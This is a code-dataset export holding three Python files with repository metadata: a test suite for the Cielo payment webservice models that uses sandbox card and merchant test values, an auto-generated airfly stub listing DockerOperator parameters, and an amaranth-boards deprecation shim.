b40dc6a3b06d804e89751ef45ce8dc58d0f155aa
|
[
"MIT"
] | null | null | null |
tests/test_models.py
|
DeveloperCielo/python-cielo-webservice
|
b40dc6a3b06d804e89751ef45ce8dc58d0f155aa
|
[
"MIT"
] | 2
|
2016-05-18T17:27:35.000Z
|
2021-06-22T21:27:37.000Z
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from unittest import TestCase
import pytest
import os
from cielo_webservice.models import (
Comercial, Cartao, Pedido, Pagamento, Autenticacao, Autorizacao, Token,
Transacao, Avs, Captura, Cancelamento, Erro, xml_to_object
)
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
class TestComercial(TestCase):
def test_validate(self):
with pytest.raises(TypeError) as excinfo:
Comercial(numero='1234', chave='1234')
assert 'numero precisa ser do tipo inteiro.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Comercial(numero=1234, chave=1234)
assert 'chave precisa ser do tipo string.' in str(excinfo.value)
def test_repr(self):
comercial = Comercial(
numero=1006993069,
chave='25fbb99741c739dd84d7b06ec78c9bac718838630f30b112d033ce2e621b34f3'
)
self.assertEqual(
repr(comercial),
'<Comercial(numero=1006993069, chave=25fbb99741c739dd84d7b06ec78c9bac718838630f30b112d033ce2e621b34f3)>'
)
class TestCartao(TestCase):
def test_validate(self):
with pytest.raises(TypeError) as excinfo:
Cartao(
numero='1234', validade=201805, indicador=1,
codigo_seguranca=123, nome_portador='Fulano Silva'
)
assert 'numero precisa ser do tipo inteiro.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Cartao(
numero=1234, validade='201805', indicador=1,
codigo_seguranca=123, nome_portador='Fulano Silva'
)
assert 'validade precisa ser do tipo inteiro.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Cartao(
numero=1234, validade=201805, indicador='1',
codigo_seguranca=123, nome_portador='Fulano Silva'
)
assert 'indicador precisa ser do tipo inteiro.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Cartao(
numero=1234, validade=201805, indicador=1,
codigo_seguranca='123', nome_portador='Fulano Silva'
)
assert 'codigo_seguranca precisa ser do tipo inteiro.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Cartao(
numero=1234, validade=201805, indicador=1,
codigo_seguranca=123, nome_portador=123
)
assert 'nome_portador precisa ser do tipo string.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Cartao(token=123)
assert 'token precisa ser do tipo string.' in str(excinfo.value)
def test_repr(self):
cartao = Cartao(
numero=4012001037141112, validade=201805, indicador=1,
codigo_seguranca=123, nome_portador='Fulano Silva'
)
self.assertEqual(
repr(cartao),
'<Cartao(numero=4012001037141112, validade=201805, indicador=1, codigo_seguranca=123, nome_portador=Fulano Silva, token=None)>'
)
class TestPedido(TestCase):
def test_validate(self):
with pytest.raises(TypeError) as excinfo:
Pedido(
numero=1234, valor=10000, moeda=986,
data_hora='2011-12-07T11:43:37',
)
assert 'numero precisa ser do tipo string.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Pedido(
numero='1234', valor='10000', moeda=986,
data_hora='2011-12-07T11:43:37',
)
assert 'valor precisa ser do tipo inteiro.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Pedido(
numero='1234', valor=10000, moeda='986',
data_hora='2011-12-07T11:43:37',
)
assert 'moeda precisa ser do tipo inteiro.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Pedido(
numero='1234', valor=10000, moeda=986,
data_hora=20111207,
)
assert 'data_hora precisa ser do tipo string.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Pedido(
numero='1234', valor=10000, moeda=986,
data_hora='2011-12-07T11:43:37', descricao=123
)
assert 'descricao precisa ser do tipo string.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Pedido(
numero='1234', valor=10000, moeda=986,
data_hora='2011-12-07T11:43:37', idioma=123
)
assert 'idioma precisa ser do tipo string.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Pedido(
numero='1234', valor=10000, moeda=986,
data_hora='2011-12-07T11:43:37', taxa_embarque='123'
)
assert 'taxa_embarque precisa ser do tipo inteiro.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Pedido(
numero='1234', valor=10000, moeda=986,
data_hora='2011-12-07T11:43:37', soft_descriptor=123
)
assert 'soft_descriptor precisa ser do tipo string.' in str(excinfo.value)
def test_repr(self):
pedido = Pedido(
numero='1234', valor=10000, moeda=986,
data_hora='2016-03-05T03:30:43.982543'
)
self.assertEqual(
repr(pedido),
'<Pedido(numero=1234, valor=10000, moeda=986, data_hora=2016-03-05T03:30:43.982543, descricao=None, idioma=PT, taxa_embarque=None, soft_descriptor=None)>'
)
class TestPagamento(TestCase):
def test_validate(self):
with pytest.raises(TypeError) as excinfo:
Pagamento(bandeira=1, produto=1, parcelas=1)
assert 'bandeira precisa ser do tipo string.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Pagamento(bandeira='visa', produto=1, parcelas=1)
assert 'produto precisa ser do tipo string.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Pagamento(bandeira='visa', produto='1', parcelas='1')
assert 'parcelas precisa ser do tipo inteiro.' in str(excinfo.value)
def test_repr(self):
pagamento = Pagamento(bandeira='visa', produto='1', parcelas=1)
self.assertEqual(
repr(pagamento),
'<Pagamento(bandeira=visa, produto=1, parcelas=1)>'
)
class TestAutenticacao(TestCase):
def test_validate(self):
with pytest.raises(TypeError) as excinfo:
Autenticacao(
codigo='1', mensagem='msg', data_hora='2011-12-07T11:43:37',
valor=10000, eci=7
)
assert 'codigo precisa ser do tipo inteiro.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Autenticacao(
codigo=1, mensagem=1, data_hora='2011-12-07T11:43:37',
valor=10000, eci=7
)
assert 'mensagem precisa ser do tipo string.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Autenticacao(
codigo=1, mensagem='msg', data_hora=201112,
valor=10000, eci=7
)
assert 'data_hora precisa ser do tipo string.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Autenticacao(
codigo=1, mensagem='msg', data_hora='2011-12-07T11:43:37',
valor='10000', eci=7
)
assert 'valor precisa ser do tipo inteiro.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Autenticacao(
codigo=1, mensagem='msg', data_hora='2011-12-07T11:43:37',
valor=10000, eci='7'
)
assert 'eci precisa ser do tipo inteiro.' in str(excinfo.value)
def test_repr(self):
autenticacao = Autenticacao(
codigo=6, mensagem='Transacao sem autenticacao',
data_hora='2016-03-05T00:03:46.158-03:00', valor=10000, eci=7
)
self.assertEqual(
repr(autenticacao),
'<Autenticacao(codigo=6, mensagem=Transacao sem autenticacao, data_hora=2016-03-05T00:03:46.158-03:00, valor=10000, eci=7)>'
)
class TestAutorizacao(TestCase):
def test_validate(self):
with pytest.raises(TypeError) as excinfo:
Autorizacao(
codigo='1', mensagem='msg', data_hora='2011-12-07T11:43:37',
valor=10000, lr="01", arp=1, nsu=1
)
assert 'codigo precisa ser do tipo inteiro.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Autorizacao(
codigo=1, mensagem=1, data_hora='2011-12-07T11:43:37',
valor=10000, lr="01", arp=1, nsu=1
)
assert 'mensagem precisa ser do tipo string.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Autorizacao(
codigo=1, mensagem='msg', data_hora=201112,
valor=10000, lr="01", arp=1, nsu=1
)
assert 'data_hora precisa ser do tipo string.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Autorizacao(
codigo=1, mensagem='msg', data_hora='2011-12-07T11:43:37',
valor='10000', lr="01", arp=1, nsu=1
)
assert 'valor precisa ser do tipo inteiro.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Autorizacao(
codigo=1, mensagem='msg', data_hora='2011-12-07T11:43:37',
valor=10000, lr=1, arp=1, nsu=1
)
assert 'lr precisa ser do tipo string.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Autorizacao(
codigo=1, mensagem='msg', data_hora='2011-12-07T11:43:37',
valor=10000, lr="01", arp='1', nsu=1
)
assert 'arp precisa ser do tipo inteiro.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Autorizacao(
codigo=1, mensagem='msg', data_hora='2011-12-07T11:43:37',
valor=10000, lr="01", arp=1, nsu='1'
)
assert 'nsu precisa ser do tipo inteiro.' in str(excinfo.value)
def test_repr(self):
autorizacao = Autorizacao(
codigo=6, mensagem='Transacao autorizada',
data_hora='2016-03-05T00:03:46.161-03:00', valor=10000, lr="00",
arp=123456, nsu=36318
)
self.assertEqual(
repr(autorizacao),
'<Autorizacao(codigo=6, mensagem=Transacao autorizada, data_hora=2016-03-05T00:03:46.161-03:00, valor=10000, lr=00, arp=123456, nsu=36318)>'
)
class TestToken(TestCase):
def test_validate(self):
with pytest.raises(TypeError) as excinfo:
Token(codigo=1, status=1, numero='1234')
assert 'codigo precisa ser do tipo string.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Token(codigo='code', status='1', numero='1234')
assert 'status precisa ser do tipo inteiro.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Token(codigo='code', status=1, numero=1234)
assert 'numero precisa ser do tipo string.' in str(excinfo.value)
def test_repr(self):
token = Token(codigo='code', status=1, numero='1234')
self.assertEqual(
repr(token),
'<Token(codigo=code, status=1, numero=1234)>'
)
class TestAvs(TestCase):
def test_validate(self):
with pytest.raises(TypeError) as excinfo:
Avs(
endereco=1, complemento='', numero=1, bairro='Bairro',
cep='00000-000'
)
assert 'endereco precisa ser do tipo string.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Avs(
endereco='Rua 1', complemento=1, numero=1, bairro='Bairro',
cep='00000-000'
)
assert 'complemento precisa ser do tipo string.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Avs(
endereco='Rua 1', complemento='', numero='1', bairro='Bairro',
cep='00000-000'
)
assert 'numero precisa ser do tipo inteiro.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Avs(
endereco='Rua 1', complemento='', numero=1, bairro=1,
cep='00000-000'
)
assert 'bairro precisa ser do tipo string.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Avs(
endereco='Rua 1', complemento='', numero=1, bairro='Bairro',
cep=00000000
)
assert 'cep precisa ser do tipo string.' in str(excinfo.value)
def test_repr(self):
avs = Avs(
endereco='Rua 1', complemento='', numero=1, bairro='Bairro',
cep='00000000'
)
self.assertEqual(
repr(avs),
'<Avs(endereco=Rua 1, complemento=, numero=1, bairro=Bairro, cep=00000000)>'
)
class TestCaptura(TestCase):
def test_validate(self):
with pytest.raises(TypeError) as excinfo:
Captura(
codigo='1', mensagem='mensagem',
data_hora='2011-12-07T11:43:37', valor=10000, taxa_embarque=0
)
assert 'codigo precisa ser do tipo inteiro.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Captura(
codigo=1, mensagem=1, data_hora='2011-12-07T11:43:37',
valor=10000, taxa_embarque=0
)
assert 'mensagem precisa ser do tipo string.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Captura(
codigo=1, mensagem='mensagem', data_hora=1,
valor=10000, taxa_embarque=0
)
assert 'data_hora precisa ser do tipo string.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Captura(
codigo=1, mensagem='mensagem', data_hora='2011-12-07T11:43:37',
valor='10000', taxa_embarque=0
)
assert 'valor precisa ser do tipo inteiro.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Captura(
codigo=1, mensagem='mensagem', data_hora='2011-12-07T11:43:37',
valor=10000, taxa_embarque='0'
)
assert 'taxa_embarque precisa ser do tipo inteiro.' in str(excinfo.value)
def test_repr(self):
captura = Captura(
codigo=1, mensagem='mensagem', data_hora='2011-12-07T11:43:37',
valor=10000, taxa_embarque=0
)
self.assertEqual(
repr(captura),
'<Captura(codigo=1, mensagem=mensagem, data_hora=2011-12-07T11:43:37, valor=10000, taxa_embarque=0)>'
)
class TestCancelamento(TestCase):
def test_validate(self):
with pytest.raises(TypeError) as excinfo:
Cancelamento(
codigo='1', mensagem='mensagem',
data_hora='2011-12-07T11:43:37', valor=10000,
)
assert 'codigo precisa ser do tipo inteiro.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Cancelamento(
codigo=1, mensagem=1, data_hora='2011-12-07T11:43:37',
valor=10000,
)
assert 'mensagem precisa ser do tipo string.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Cancelamento(
codigo=1, mensagem='mensagem', data_hora=201112, valor=10000
)
assert 'data_hora precisa ser do tipo string.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Cancelamento(
codigo=1, mensagem='mensagem',
data_hora='2011-12-07T11:43:37', valor='10000',
)
assert 'valor precisa ser do tipo inteiro.' in str(excinfo.value)
def test_repr(self):
cancelamento = Cancelamento(
codigo=1, mensagem='mensagem', data_hora='2011-12-07T11:43:37',
valor=10000
)
self.assertEqual(
repr(cancelamento),
'<Cancelamento(codigo=1, mensagem=mensagem, data_hora=2011-12-07T11:43:37, valor=10000)>'
)
class TestErro(TestCase):
def test_validate(self):
with pytest.raises(TypeError) as excinfo:
Erro(codigo=1, mensagem='mensagem')
assert 'codigo precisa ser do tipo string.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Erro(codigo='001', mensagem=1)
assert 'mensagem precisa ser do tipo string.' in str(excinfo.value)
def test_repr(self):
erro = Erro(codigo='001', mensagem='erro')
self.assertEqual(
repr(erro),
'<Erro(codigo=001, mensagem=erro)>'
)
class TestTransacao(TestCase):
def test_validate(self):
comercial = Comercial(numero=1234, chave='1234')
cartao = Cartao(
numero=1234, validade=201805, indicador=1,
codigo_seguranca=123, nome_portador='Fulano Silva'
)
pedido = Pedido(
numero='1234', valor=10000, moeda=986,
data_hora='2011-12-07T11:43:37',
)
pagamento = Pagamento(bandeira='visa', produto='1', parcelas=1)
autenticacao = Autenticacao(
codigo=1, mensagem='msg', data_hora='2011-12-07T11:43:37',
valor=10000, eci=7
)
autorizacao = Autorizacao(
codigo=1, mensagem='msg', data_hora='2011-12-07T11:43:37',
valor=10000, lr="01", arp=1, nsu=1
)
token = Token(codigo='codigo', status=1, numero='1234')
avs = Avs(
endereco='Rua 1', complemento='', numero=1, bairro='Bairro',
cep='00000-000'
)
captura = Captura(
codigo=1, mensagem='mensagem',
data_hora='2011-12-07T11:43:37', valor=10000, taxa_embarque=0
)
cancelamento = Cancelamento(
codigo=1, mensagem='mensagem', data_hora='2011-12-07T11:43:37',
valor=10000,
)
with pytest.raises(TypeError) as excinfo:
Transacao(
comercial=1, cartao=cartao, pedido=pedido,
pagamento=pagamento,
)
assert 'comercial precisa ser do tipo Comercial.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Transacao(
comercial=comercial, cartao=1, pedido=pedido,
pagamento=pagamento,
)
assert 'cartao precisa ser do tipo Cartao.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Transacao(
comercial=comercial, cartao=cartao, pedido=1,
pagamento=pagamento,
)
assert 'pedido precisa ser do tipo Pedido.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Transacao(
comercial=comercial, cartao=cartao, pedido=pedido,
pagamento=1,
)
assert 'pagamento precisa ser do tipo Pagamento.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Transacao(
comercial=comercial, cartao=cartao, pedido=pedido,
pagamento=pagamento, autorizar='1'
)
assert 'autorizar precisa ser do tipo inteiro.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Transacao(
comercial=comercial, cartao=cartao, pedido=pedido,
pagamento=pagamento, autorizar=1, url_retorno=1
)
assert 'url_retorno precisa ser do tipo string.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Transacao(
comercial=comercial, cartao=cartao, pedido=pedido,
pagamento=pagamento, capturar='false'
)
assert 'capturar precisa ser do tipo booleano.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Transacao(
comercial=comercial, cartao=cartao, pedido=pedido,
pagamento=pagamento, campo_livre=1
)
assert 'campo_livre precisa ser do tipo string.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Transacao(
comercial=comercial, cartao=cartao, pedido=pedido,
pagamento=pagamento, bin='1234'
)
assert 'bin precisa ser do tipo inteiro.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Transacao(
comercial=comercial, cartao=cartao, pedido=pedido,
pagamento=pagamento, gerar_token='false', avs=avs
)
assert 'gerar_token precisa ser do tipo booleano.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Transacao(
comercial=comercial, cartao=cartao, pedido=pedido,
pagamento=pagamento, avs=1
)
assert 'avs precisa ser do tipo Avs.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Transacao(
comercial=comercial, cartao=cartao, pedido=pedido,
pagamento=pagamento, autenticacao=1, autorizacao=autorizacao
)
assert 'autenticacao precisa ser do tipo Autenticacao.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Transacao(
comercial=comercial, cartao=cartao, pedido=pedido,
pagamento=pagamento, autenticacao=autenticacao, autorizacao=1,
captura=captura
)
assert 'autorizacao precisa ser do tipo Autorizacao.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Transacao(
comercial=comercial, cartao=cartao, pedido=pedido,
pagamento=pagamento, autenticacao=autenticacao,
autorizacao=autorizacao, captura=1
)
assert 'captura precisa ser do tipo Captura.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Transacao(
comercial=comercial, cartao=cartao, pedido=pedido,
pagamento=pagamento, tid=1, pan='pan', status=1
)
assert 'tid precisa ser do tipo string.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Transacao(
comercial=comercial, cartao=cartao, pedido=pedido,
pagamento=pagamento, tid='1', pan=1, status=1
)
assert 'pan precisa ser do tipo string.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Transacao(
comercial=comercial, cartao=cartao, pedido=pedido,
pagamento=pagamento, tid='1', pan='pan', status='1',
url_autenticacao='http://google.com'
)
assert 'status precisa ser do tipo inteiro.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Transacao(
comercial=comercial, cartao=cartao, pedido=pedido,
pagamento=pagamento, tid='1', pan='pan', status=1,
url_autenticacao=1, token=token
)
assert 'url_autenticacao precisa ser do tipo string.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Transacao(
comercial=comercial, cartao=cartao, pedido=pedido,
pagamento=pagamento, tid='1', pan='pan', status=1, token=1,
cancelamento=cancelamento
)
assert 'token precisa ser do tipo Token.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Transacao(
comercial=comercial, cartao=cartao, pedido=pedido,
pagamento=pagamento, tid='1', pan='pan', status=1,
cancelamento=1
)
assert 'cancelamento precisa ser do tipo Cancelamento.' in str(excinfo.value)
def test_repr(self):
comercial = Comercial(
numero=1006993069, chave='25fbb99741c739dd84d7b06ec78c9bac718838630f30b112d033ce2e621b34f3'
)
cartao = Cartao(
numero=4012001037141112, validade=201805, indicador=1,
codigo_seguranca=123, nome_portador='Fulano Silva'
)
pedido = Pedido(
numero='1234', valor=10000, moeda=986,
data_hora='2016-03-05T05:01:30.738727'
)
pagamento = Pagamento(bandeira='visa', produto='1', parcelas=1)
transacao = Transacao(
comercial=comercial, cartao=cartao, pedido=pedido,
pagamento=pagamento, autorizar=3, capturar=True
)
self.assertEqual(
repr(transacao),
'<Transacao(comercial=<Comercial(numero=1006993069, chave=25fbb99741c739dd84d7b06ec78c9bac718838630f30b112d033ce2e621b34f3)>, cartao=<Cartao(numero=4012001037141112, validade=201805, indicador=1, codigo_seguranca=123, nome_portador=Fulano Silva, token=None)>, pedido=<Pedido(numero=1234, valor=10000, moeda=986, data_hora=2016-03-05T05:01:30.738727, descricao=None, idioma=PT, taxa_embarque=None, soft_descriptor=None)>, pagamento=<Pagamento(bandeira=visa, produto=1, parcelas=1)>, url_retorno=None, autorizar=3, capturar=True, campo_livre=None, bin=None, gerar_token=None, avs=None, autenticacao=None, autorizacao=None, captura=None, token=None, cancelamento=None, tid=None, pan=None, status=None, url_autenticacao=None)>'
)
class TestXmlToObject(TestCase):
def test_autorizacao_direta(self):
transacao = xml_to_object(
open(os.path.join(BASE_DIR, 'xml1.xml')).read()
)
self.assertEqual(transacao.tid, '100699306948372E1001')
self.assertEqual(
transacao.pan, 'IqVz7P9zaIgTYdU41HaW/OB/d7Idwttqwb2vaTt8MT0='
)
self.assertEqual(transacao.status, 6)
self.assertTrue(isinstance(transacao.pedido, Pedido))
self.assertTrue(isinstance(transacao.pagamento, Pagamento))
self.assertTrue(isinstance(transacao.autenticacao, Autenticacao))
self.assertTrue(isinstance(transacao.autorizacao, Autorizacao))
self.assertTrue(isinstance(transacao.captura, Captura))
def test_autorizacao_direta_com_gerar_token(self):
transacao = xml_to_object(
open(os.path.join(BASE_DIR, 'xml3.xml')).read()
)
self.assertEqual(transacao.tid, '10069930694847D91001')
self.assertEqual(
transacao.pan, 'IqVz7P9zaIgTYdU41HaW/OB/d7Idwttqwb2vaTt8MT0='
)
self.assertEqual(transacao.status, 6)
self.assertTrue(isinstance(transacao.pedido, Pedido))
self.assertTrue(isinstance(transacao.pagamento, Pagamento))
self.assertTrue(isinstance(transacao.autenticacao, Autenticacao))
self.assertTrue(isinstance(transacao.autorizacao, Autorizacao))
self.assertTrue(isinstance(transacao.captura, Captura))
self.assertTrue(isinstance(transacao.token, Token))
def test_transacao_autenticada(self):
transacao = xml_to_object(
open(os.path.join(BASE_DIR, 'xml2.xml')).read()
)
self.assertTrue(isinstance(transacao, Transacao))
self.assertEqual(transacao.tid, '1006993069483CE61001')
self.assertEqual(
transacao.pan, 'IqVz7P9zaIgTYdU41HaW/OB/d7Idwttqwb2vaTt8MT0='
)
self.assertEqual(transacao.status, 0)
self.assertEqual(
transacao.url_autenticacao,
'https://qasecommerce.cielo.com.br/web/index.cbmp?id=5a3a7c089f5299f535dcdd1f502a38ba'
)
self.assertTrue(isinstance(transacao.pedido, Pedido))
self.assertTrue(isinstance(transacao.pagamento, Pagamento))
self.assertFalse(transacao.autenticacao)
self.assertFalse(transacao.autorizacao)
self.assertFalse(transacao.captura)
def test_token(self):
token = xml_to_object(
open(os.path.join(BASE_DIR, 'xml4.xml')).read()
)
self.assertTrue(isinstance(token, Token))
self.assertEqual(
token.codigo, 'HYcQ0MQ39fl8kn9OR7lFsTtxa+wNuM4lqQLUeN5SYZY='
)
self.assertEqual(token.status, 1)
self.assertEqual(token.numero, '211141******2104')
def test_cancelamento(self):
transacao = xml_to_object(
open(os.path.join(BASE_DIR, 'xml7.xml')).read()
)
self.assertTrue(isinstance(transacao, Transacao))
self.assertEqual(transacao.tid, '1006993069484E8B1001')
self.assertEqual(
transacao.pan, 'IqVz7P9zaIgTYdU41HaW/OB/d7Idwttqwb2vaTt8MT0='
)
self.assertTrue(isinstance(transacao.cancelamento, Cancelamento))
self.assertEqual(transacao.cancelamento.codigo, 9)
self.assertEqual(
transacao.cancelamento.mensagem, 'Transacao cancelada com sucesso'
)
self.assertEqual(
transacao.cancelamento.data_hora, '2015-10-06T16:45:10.547-03:00'
)
self.assertEqual(transacao.cancelamento.valor, 10000)
def test_erro(self):
erro = xml_to_object(
open(os.path.join(BASE_DIR, 'xml8.xml')).read()
)
self.assertTrue(isinstance(erro, Erro))
self.assertEqual(erro.codigo, '000')
self.assertEqual(erro.mensagem, 'Mensagem')
| 38.981865
| 735
| 0.601017
| 3,313
| 30,094
| 5.407486
| 0.062783
| 0.039073
| 0.062517
| 0.097684
| 0.834887
| 0.819369
| 0.800837
| 0.800837
| 0.771365
| 0.765336
| 0
| 0.088468
| 0.29348
| 30,094
| 771
| 736
| 39.032425
| 0.754115
| 0.000698
| 0
| 0.52454
| 0
| 0.01227
| 0.207808
| 0.041934
| 0
| 0
| 0
| 0
| 0.190184
| 1
| 0.046012
| false
| 0
| 0.007669
| 0
| 0.07362
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
fa7c10bc5d6f494fe9c49d2811d058097ea2e923
| 1,573
|
py
|
Python
|
src/airfly/_vendor/airflow/providers/docker/operators/docker.py
|
ryanchao2012/airfly
|
230ddd88885defc67485fa0c51f66c4a67ae98a9
|
[
"MIT"
] | 7
|
2021-09-27T11:38:48.000Z
|
2022-02-01T06:06:24.000Z
|
src/airfly/_vendor/airflow/providers/docker/operators/docker.py
|
ryanchao2012/airfly
|
230ddd88885defc67485fa0c51f66c4a67ae98a9
|
[
"MIT"
] | null | null | null |
src/airfly/_vendor/airflow/providers/docker/operators/docker.py
|
ryanchao2012/airfly
|
230ddd88885defc67485fa0c51f66c4a67ae98a9
|
[
"MIT"
] | null | null | null |
# Auto generated by 'inv collect-airflow'
from airfly._vendor.airflow.models.baseoperator import BaseOperator
class DockerOperator(BaseOperator):
image: "str"
api_version: "typing.Union[str, NoneType]"
command: "typing.Union[str, typing.List[str], NoneType]"
container_name: "typing.Union[str, NoneType]"
cpus: "float"
docker_url: "str"
environment: "typing.Union[typing.Dict, NoneType]"
private_environment: "typing.Union[typing.Dict, NoneType]"
force_pull: "bool"
mem_limit: "typing.Union[float, str, NoneType]"
host_tmp_dir: "typing.Union[str, NoneType]"
network_mode: "typing.Union[str, NoneType]"
tls_ca_cert: "typing.Union[str, NoneType]"
tls_client_cert: "typing.Union[str, NoneType]"
tls_client_key: "typing.Union[str, NoneType]"
tls_hostname: "typing.Union[str, bool, NoneType]"
tls_ssl_version: "typing.Union[str, NoneType]"
tmp_dir: "str"
user: "typing.Union[str, int, NoneType]"
mounts: "typing.Union[typing.List[docker.types.services.Mount], NoneType]"
entrypoint: "typing.Union[str, typing.List[str], NoneType]"
working_dir: "typing.Union[str, NoneType]"
xcom_all: "bool"
docker_conn_id: "typing.Union[str, NoneType]"
dns: "typing.Union[typing.List[str], NoneType]"
dns_search: "typing.Union[typing.List[str], NoneType]"
auto_remove: "bool"
shm_size: "typing.Union[int, NoneType]"
tty: "bool"
privileged: "bool"
cap_add: "typing.Union[typing.Iterable[str], NoneType]"
extra_hosts: "typing.Union[typing.Dict[str, str], NoneType]"
| 41.394737
| 78
| 0.703751
| 203
| 1,573
| 5.310345
| 0.359606
| 0.234694
| 0.181818
| 0.204082
| 0.410019
| 0.263451
| 0.12987
| 0
| 0
| 0
| 0
| 0
| 0.149396
| 1,573
| 37
| 79
| 42.513514
| 0.80568
| 0.024793
| 0
| 0
| 1
| 0
| 0.537206
| 0.148172
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.029412
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
|
0
| 6
|
faafee2feb447496abcc1d1003281ec52dad7439
| 254
|
py
|
Python
|
nmigen_boards/qmtech_10cl006.py
|
hansfbaier/amaranth-boards
|
a3e92db69e74cc18a42808f6f72068f05efe018e
|
[
"BSD-2-Clause"
] | 1
|
2022-01-22T20:23:07.000Z
|
2022-01-22T20:23:07.000Z
|
nmigen_boards/qmtech_10cl006.py
|
amaranth-community-unofficial/amaranth-boards
|
eacb18700d0ed97f525737ca80d923ebd5851505
|
[
"BSD-2-Clause"
] | null | null | null |
nmigen_boards/qmtech_10cl006.py
|
amaranth-community-unofficial/amaranth-boards
|
eacb18700d0ed97f525737ca80d923ebd5851505
|
[
"BSD-2-Clause"
] | null | null | null |
from amaranth_boards.qmtech_10cl006 import *
from amaranth_boards.qmtech_10cl006 import __all__
import warnings
warnings.warn("instead of nmigen_boards.qmtech_10cl006, use amaranth_boards.qmtech_10cl006",
DeprecationWarning, stacklevel=2)
| 36.285714
| 92
| 0.818898
| 31
| 254
| 6.322581
| 0.516129
| 0.244898
| 0.387755
| 0.413265
| 0.377551
| 0.377551
| 0
| 0
| 0
| 0
| 0
| 0.094595
| 0.125984
| 254
| 7
| 93
| 36.285714
| 0.788288
| 0
| 0
| 0
| 0
| 0
| 0.294118
| 0.231373
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.6
| 0
| 0.6
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.